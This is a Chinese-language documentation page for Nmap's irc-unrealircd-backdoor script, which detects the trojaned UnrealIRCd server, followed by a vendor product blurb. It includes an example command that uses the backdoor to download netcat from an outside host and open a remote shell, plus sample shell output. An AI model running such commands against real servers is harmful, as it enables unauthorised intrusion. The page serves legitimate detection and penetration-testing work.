指令類型:portrule
下載:https://svn.nmap.org/nmap/scripts/irc-unrealircd-backdoor.nse
指令摘要
檢查 IRC 伺服器是否被植入後門,方法是執行基於時間的命令(ping)並檢查響應時間。
irc-unrealircd-backdoor.command 腳本參數可以用來在遠端系統上執行任意命令。由於這種漏洞的特性(命令的輸出永遠不會返回),我們無法獲得命令的輸出。然而,它可以用來啟動 netcat 監聽器,如下所示:
$ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' <target>
$ ncat -vv localhost 4444
Ncat: Version 5.30BETA1 ( https://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:4444.
pwd
/home/ron/downloads/Unreal3.2-bad
whoami
ron
Metasploit 也可用於利用這個漏洞。
除了執行任意命令外,還可以傳遞 irc-unrealircd-backdoor.kill 腳本參數,該參數僅用於終止 UnrealIRCd 進程。
參考資料:
指令參數
irc-unrealircd-backdoor.kill
如果設置為 1 或 true,則終止運行中的被後門感染的 UnrealIRCd。
irc-unrealircd-backdoor.wait
在執行檢查前等待的時間(秒)。建議設置這個參數以進行更可靠的檢查(100 是一個好值)。
irc-unrealircd-backdoor.command
在遠端系統上運行的任意命令(注意,您將看不到命令的輸出)。即使主機不易受攻擊,也將始終嘗試這種方法。模式 %IP% 將被替換為目標主機的 IP 地址。
指令範例
nmap -sV --script=irc-unrealircd-backdoor <target>
指令輸出
PORT STATE SERVICE
6667/tcp open irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
作者:
Vlatko Kosturjak Ron Bowes
License: Same as Nmap--See https://nmap.org/book/man-legal.html
隨選即看研討會
延伸閱讀
CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。